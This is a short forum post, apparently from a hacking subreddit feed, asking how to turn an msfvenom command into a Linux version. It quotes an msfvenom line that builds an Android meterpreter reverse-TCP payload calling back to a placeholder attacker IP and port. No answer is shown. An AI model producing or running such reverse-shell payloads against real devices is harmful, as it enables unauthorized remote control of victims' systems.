Linux payloads using msfvenom

how wouldIi modify this to linux

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=<Attacker Port> -a <Architecture> -f <Format> -o <Output File Name>

submitted by /u/lokii_bl
[link] [comments]

from hacking: security in practice https://ift.tt/Gowfan5

Comments